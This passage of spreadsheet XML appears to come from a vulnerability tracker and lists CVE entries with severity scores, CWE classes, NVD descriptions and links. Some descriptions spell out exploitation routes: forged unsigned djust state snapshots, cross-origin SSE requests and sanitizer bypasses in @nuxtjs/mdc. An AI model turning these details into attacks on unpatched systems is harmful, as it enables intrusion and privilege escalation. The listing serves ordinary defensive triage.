          <t>Insufficiently protected credentials issue exists in Remote I/O Coupler Unit (Server Type) CPSN-MCB271-*. If this vulnerability is exploited, sensitive information may be restored from a backup file.</t>
        </is>
      </c>
      <c r="S374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82786</t>
        </is>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B375" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84535</t>
        </is>
      </c>
      <c r="D375" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E375" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F375" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G375" s="5" t="inlineStr"/>
      <c r="H375" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I375" s="5" t="inlineStr"/>
      <c r="J375" s="5" t="inlineStr"/>
      <c r="K375" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L375" s="5" t="inlineStr"/>
      <c r="M375" s="5" t="inlineStr"/>
      <c r="N375" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O375" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P375" s="5" t="inlineStr"/>
      <c r="Q375" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R375" s="5" t="inlineStr">
        <is>
          <t>An authorization issue was addressed with improved state management. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to break out of its sandbox.</t>
        </is>
      </c>
      <c r="S375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84535</t>
        </is>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B376" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84577</t>
        </is>
      </c>
      <c r="D376" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E376" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F376" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G376" s="5" t="inlineStr"/>
      <c r="H376" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I376" s="5" t="inlineStr"/>
      <c r="J376" s="5" t="inlineStr"/>
      <c r="K376" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L376" s="5" t="inlineStr"/>
      <c r="M376" s="5" t="inlineStr"/>
      <c r="N376" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O376" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P376" s="5" t="inlineStr"/>
      <c r="Q376" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R376" s="5" t="inlineStr">
        <is>
          <t>An access issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Golden Gate 27, macOS Tahoe 26.7. An app may be able to bypass sandbox restrictions.</t>
        </is>
      </c>
      <c r="S376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84577</t>
        </is>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B377" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85921</t>
        </is>
      </c>
      <c r="D377" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E377" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F377" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G377" s="5" t="inlineStr"/>
      <c r="H377" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I377" s="5" t="inlineStr"/>
      <c r="J377" s="5" t="inlineStr"/>
      <c r="K377" s="5" t="inlineStr"/>
      <c r="L377" s="5" t="inlineStr"/>
      <c r="M377" s="5" t="inlineStr"/>
      <c r="N377" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O377" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P377" s="5" t="inlineStr"/>
      <c r="Q377" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R377" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85921</t>
        </is>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B378" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86107</t>
        </is>
      </c>
      <c r="D378" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E378" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F378" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G378" s="5" t="inlineStr"/>
      <c r="H378" s="5" t="inlineStr"/>
      <c r="I378" s="5" t="inlineStr"/>
      <c r="J378" s="5" t="inlineStr"/>
      <c r="K378" s="5" t="inlineStr"/>
      <c r="L378" s="5" t="inlineStr"/>
      <c r="M378" s="5" t="inlineStr"/>
      <c r="N378" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O378" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P378" s="5" t="inlineStr"/>
      <c r="Q378" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R378" s="5" t="inlineStr">
        <is>
          <t>The VeloCloud Edge and Gateway exhibit an out-of-bounds write vulnerability when processing tunneled IP fragments between authenticated overlay neighbors. This vulnerability impacts the VeloCloud VCMP tunnel protocol only.
A successful exploit can cause the affected process to terminate and restart, leading to a temporary disruption of traffic. Hosts on the internet that are unauthenticated and unable to form an overlay peer relationship can not trigger the vulnerable logic.</t>
        </is>
      </c>
      <c r="S378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86107</t>
        </is>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B379" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89973</t>
        </is>
      </c>
      <c r="D379" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E379" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F379" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G379" s="5" t="inlineStr"/>
      <c r="H379" s="5" t="inlineStr"/>
      <c r="I379" s="5" t="inlineStr"/>
      <c r="J379" s="5" t="inlineStr"/>
      <c r="K379" s="5" t="inlineStr"/>
      <c r="L379" s="5" t="inlineStr"/>
      <c r="M379" s="5" t="inlineStr"/>
      <c r="N379" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O379" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P379" s="5" t="inlineStr"/>
      <c r="Q379" s="5" t="inlineStr"/>
      <c r="R379" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme-tcp: check the data direction of a C2HData PDU
nvme_tcp_handle_c2h_data() finds the request by command id and checks
that it has a payload, but it does not check that the command asked for
data to be read.  A controller that answers a write command with C2HData
therefore reaches nvme_tcp_recv_data(), where _copy_to_iter() hits
WARN_ON_ONCE(i-&gt;data_source) and returns 0.  The receive path turns that
into -EFAULT and resets the controller.
No data is copied, so this is not memory corruption.  What a controller
gets is a kernel warning it can raise at will, which is fatal on a host
booted with panic_on_warn.
The send path already knows the direction - it consults rq_data_dir()
when it builds a command - and nvme_tcp_handle_r2t() checks the length
and the offset of the request it names.  The C2HData path does not check
the direction at all.
Reject a C2HData PDU whose command is not a read.  Rejecting it fails
the command and resets the controller, as the neighbouring check in this
function does; what goes away is the warning.
  [    6.885580] ------------[ cut here ]------------
  [    6.886457] WARNING: lib/iov_iter.c:193 at _copy_to_iter+0x289/0x1330, CPU#0: kworker/0:1H/71
  [    6.888137] CPU: 0 UID: 0 PID: 71 Comm: kworker/0:1H Not tainted 7.2.0-rc5-NVMETCP-gf5098b6bae76 #1 PREEMPT(lazy)
  [    6.891165] Workqueue: nvme_tcp_wq nvme_tcp_io_work
  [    6.891875] RIP: 0010:_copy_to_iter+0x289/0x1330
  [    6.903739] Call Trace:
  [    6.904085]  &lt;TASK&gt;
  [    6.909254]  __skb_datagram_iter+0x433/0x820
  [    6.911026]  skb_copy_datagram_iter+0x37/0x120
  [    6.911622]  nvme_tcp_recv_skb+0xa07/0x4320
  [    6.913378]  __tcp_read_sock+0x1ab/0x810
  [    6.915788]  nvme_tcp_try_recv+0x152/0x1e0
  [    6.918222]  nvme_tcp_io_work+0x1e4/0x6c0
  [    6.926906]  &lt;/TASK&gt;
  [    6.927226] ---[ end trace 0000000000000000 ]---
  [    6.927878] nvme nvme0: queue 1 failed to copy request 0x71 data
  [    6.928709] nvme nvme0: receive failed:  -14</t>
        </is>
      </c>
      <c r="S379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89973</t>
        </is>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B380" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92729</t>
        </is>
      </c>
      <c r="D380" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E380" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F380" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G380" s="5" t="inlineStr"/>
      <c r="H380" s="5" t="inlineStr"/>
      <c r="I380" s="5" t="inlineStr"/>
      <c r="J380" s="5" t="inlineStr"/>
      <c r="K380" s="5" t="inlineStr"/>
      <c r="L380" s="5" t="inlineStr"/>
      <c r="M380" s="5" t="inlineStr"/>
      <c r="N380" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O380" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P380" s="5" t="inlineStr"/>
      <c r="Q380" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-862</t>
        </is>
      </c>
      <c r="R380" s="5" t="inlineStr">
        <is>
          <t>SigNoz versions 0.88.0 through 0.141.0 fail to apply authorization wrappers to trace-funnel analytics endpoints in the HTTP handler. Unauthenticated attackers can submit arbitrary funnel definitions to retrieve trace analytics including identifiers, durations, span counts, service topology, and error activity without credentials.</t>
        </is>
      </c>
      <c r="S380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92729</t>
        </is>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B381" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C381" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-43936</t>
        </is>
      </c>
      <c r="D381" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E381" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F381" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G381" s="5" t="inlineStr"/>
      <c r="H381" s="5" t="inlineStr"/>
      <c r="I381" s="5" t="inlineStr"/>
      <c r="J381" s="5" t="inlineStr"/>
      <c r="K381" s="5" t="inlineStr"/>
      <c r="L381" s="5" t="inlineStr"/>
      <c r="M381" s="5" t="inlineStr"/>
      <c r="N381" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O381" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P381" s="5" t="inlineStr"/>
      <c r="Q381" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R381" s="5" t="inlineStr">
        <is>
          <t>Dell ObjectScale, versions prior to ObjectScale 4.4.0.0, contains an Improper Authentication vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Unauthorized access.</t>
        </is>
      </c>
      <c r="S381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-43936</t>
        </is>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B382" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16335</t>
        </is>
      </c>
      <c r="D382" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E382" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F382" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G382" s="5" t="inlineStr"/>
      <c r="H382" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I382" s="5" t="inlineStr"/>
      <c r="J382" s="5" t="inlineStr"/>
      <c r="K382" s="5" t="inlineStr"/>
      <c r="L382" s="5" t="inlineStr"/>
      <c r="M382" s="5" t="inlineStr"/>
      <c r="N382" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O382" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P382" s="5" t="inlineStr"/>
      <c r="Q382" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R382" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 IBM DataStage could allow a remote authenticated attacker to read, write, or delete arbitrary files due to a path traversal vulnerability.</t>
        </is>
      </c>
      <c r="S382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16335</t>
        </is>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B383" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20335</t>
        </is>
      </c>
      <c r="D383" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E383" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F383" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G383" s="5" t="inlineStr"/>
      <c r="H383" s="5" t="inlineStr"/>
      <c r="I383" s="5" t="inlineStr"/>
      <c r="J383" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K383" s="5" t="inlineStr"/>
      <c r="L383" s="5" t="inlineStr"/>
      <c r="M383" s="5" t="inlineStr"/>
      <c r="N383" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O383" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P383" s="5" t="inlineStr"/>
      <c r="Q383" s="5" t="inlineStr">
        <is>
          <t>CWE-682</t>
        </is>
      </c>
      <c r="R383" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Secure Adaptive Security Appliance Software, Cisco Secure Firewall Threat Defense Software and Cisco Secure Firewall Management Center Software engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20335 are related to incorrect calculation issues that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-682.</t>
        </is>
      </c>
      <c r="S383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20335</t>
        </is>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B384" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27552</t>
        </is>
      </c>
      <c r="D384" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E384" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F384" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G384" s="5" t="inlineStr"/>
      <c r="H384" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I384" s="5" t="inlineStr"/>
      <c r="J384" s="5" t="inlineStr"/>
      <c r="K384" s="5" t="inlineStr"/>
      <c r="L384" s="5" t="inlineStr"/>
      <c r="M384" s="5" t="inlineStr"/>
      <c r="N384" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O384" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P384" s="5" t="inlineStr"/>
      <c r="Q384" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R384" s="5" t="inlineStr">
        <is>
          <t>A low-privileged remote attacker can exploit improper authorization in the /index.php/attached_devices_tab/do_upload endpoint to upload IODD files to the device, potentially altering device behavior or causing system crashes.</t>
        </is>
      </c>
      <c r="S384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27552</t>
        </is>
      </c>
    </row>
    <row r="385">
      <c r="A385" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B385" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54178</t>
        </is>
      </c>
      <c r="D385" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E385" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F385" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G385" s="5" t="inlineStr"/>
      <c r="H385" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I385" s="5" t="inlineStr"/>
      <c r="J385" s="5" t="inlineStr"/>
      <c r="K385" s="5" t="inlineStr"/>
      <c r="L385" s="5" t="inlineStr"/>
      <c r="M385" s="5" t="inlineStr"/>
      <c r="N385" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O385" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P385" s="5" t="inlineStr"/>
      <c r="Q385" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="R385" s="5" t="inlineStr">
        <is>
          <t>backpack/crud provides Create, Read, Update &amp; Delete (CRUD) functions for Backpack, a collection of Laravel packages that help users build custom administration panels. Prior to 6.8.12 and 7.0.35, HasUploadFields::uploadMultipleFilesToDisk in src/app/Models/Traits/HasUploadFields.php trusts disk-relative paths from clear_&lt;attribute&gt;[] and passes them to Storage::disk()-&gt;delete without confirming that the paths are persisted on the current model record. An authenticated user with Update access to a CRUD using this mutator through src/app/Models/Traits/CrudTrait.php can delete another record's attachment, a shared asset, or another operational file on the configured disk by submitting its path. The newer MultipleFiles uploader is not affected because it intersects requested deletions with the record's persisted file list. This flaw does not permit reading the deleted files. The 5.x line remains affected through its final releases. This issue is fixed in versions 6.8.12 and 7.0.35.</t>
        </is>
      </c>
      <c r="S385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54178</t>
        </is>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B386" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61591</t>
        </is>
      </c>
      <c r="D386" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E386" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F386" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G386" s="5" t="inlineStr"/>
      <c r="H386" s="5" t="inlineStr"/>
      <c r="I386" s="5" t="inlineStr"/>
      <c r="J386" s="5" t="inlineStr"/>
      <c r="K386" s="5" t="inlineStr"/>
      <c r="L386" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M386" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N386" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O386" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P386" s="5" t="inlineStr"/>
      <c r="Q386" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-915</t>
        </is>
      </c>
      <c r="R386" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, for views that opt into state snapshots, the snapshot `state_json` embedded in the client page was restored on reconnect as trusted view state with no integrity check. A client could edit the unsigned `state_json` in their page and return it in the reconnect mount frame to inject arbitrary view attributes — e.g. flip `is_admin` to `True`, or change `account_id` / `balance` — escalating privilege or tampering with business state held in public view attributes (the normal djust pattern). This issue is fixed in djust 1.0.7. State snapshots are signed; unsigned or forged snapshots are rejected on the back-navigation restore path. As a workaround, do not enable state snapshots; do not hold authorization/ownership state in public view attributes.</t>
        </is>
      </c>
      <c r="S386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61591</t>
        </is>
      </c>
    </row>
    <row r="387">
      <c r="A387" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B387" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61593</t>
        </is>
      </c>
      <c r="D387" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E387" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F387" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G387" s="5" t="inlineStr"/>
      <c r="H387" s="5" t="inlineStr"/>
      <c r="I387" s="5" t="inlineStr"/>
      <c r="J387" s="5" t="inlineStr"/>
      <c r="K387" s="5" t="inlineStr"/>
      <c r="L387" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M387" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N387" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O387" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P387" s="5" t="inlineStr"/>
      <c r="Q387" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R387" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, the SSE client→server POST endpoints are `@csrf_exempt` and the SSE GET stream endpoint had no Origin check, so a cross-origin page could drive a victim-cookie-authenticated SSE session: force the victim's browser to GET the stream URL (which creates and mounts a LiveView as the victim) and POST to the message endpoint with `credentials: include` to fire state-changing event handlers as the victim. The URL `session_id` is client-chosen (validated only for UUID *format*), so it is not a CSRF token, and a JSON body sent as `text/plain` is a CORS simple request with no preflight. The issue is fixed in 1.0.7. All three SSE endpoints validate the request `Origin` against `ALLOWED_HOSTS` (mirroring the WebSocket CSWSH defense) and reject cross-origin requests with 403; the POST endpoints additionally require `Content-Type: application/json` (415 otherwise), closing the `text/plain` simple-request bypass. As a workaround, disable the SSE transport, or front it with a proxy that enforces an Origin allowlist.</t>
        </is>
      </c>
      <c r="S387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61593</t>
        </is>
      </c>
    </row>
    <row r="388">
      <c r="A388" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B388" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63671</t>
        </is>
      </c>
      <c r="D388" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E388" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F388" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G388" s="5" t="inlineStr"/>
      <c r="H388" s="5" t="inlineStr"/>
      <c r="I388" s="5" t="inlineStr"/>
      <c r="J388" s="5" t="inlineStr"/>
      <c r="K388" s="5" t="inlineStr"/>
      <c r="L388" s="5" t="inlineStr">
        <is>
          <t>npm:@nuxtjs/mdc</t>
        </is>
      </c>
      <c r="M388" s="5" t="inlineStr">
        <is>
          <t>0.22.1</t>
        </is>
      </c>
      <c r="N388" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O388" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P388" s="5" t="inlineStr"/>
      <c r="Q388" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-79</t>
        </is>
      </c>
      <c r="R388" s="5" t="inlineStr">
        <is>
          <t>MDC is a tool to take regular Markdown and write documents interacting deeply with a Vue component. Prior to 0.22.1, @nuxtjs/mdc uses parseMarkdown with allowDangerousHtml enabled by default and relies on validateProps, validateProp, and unsafeLinkPrefix to remove executable URLs from untrusted Markdown. validateProp checks only attributes named href or src, allowing an SVG xlink:href value represented as xLinkHref to retain a javascript: URL that executes in the page origin when selected. The data:text/html denylist entries are also compared against url.protocol, which is only data:, so an iframe src containing data:text/html survives sanitization and executes in an opaque origin when loaded. Plain href javascript: URLs, srcdoc, object, script, and base elements are already blocked, making these two paths specific sibling gaps in the sanitizer. This issue is fixed in version 0.22.1.</t>
        </is>
      </c>
      <c r="S388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63671</t>
        </is>
      </c>
    </row>
    <row r="389">
      <c r="A389" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B389" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65415</t>
        </is>
      </c>
      <c r="D389" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E389" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F389" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G389" s="5" t="inlineStr"/>
      <c r="H389" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I389" s="5" t="inlineStr"/>
      <c r="J389" s="5" t="inlineStr"/>
      <c r="K389" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L389" s="5" t="inlineStr"/>
      <c r="M389" s="5" t="inlineStr"/>
      <c r="N389" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O389" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P389" s="5" t="inlineStr"/>
      <c r="Q389" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R389" s="5" t="inlineStr">
        <is>
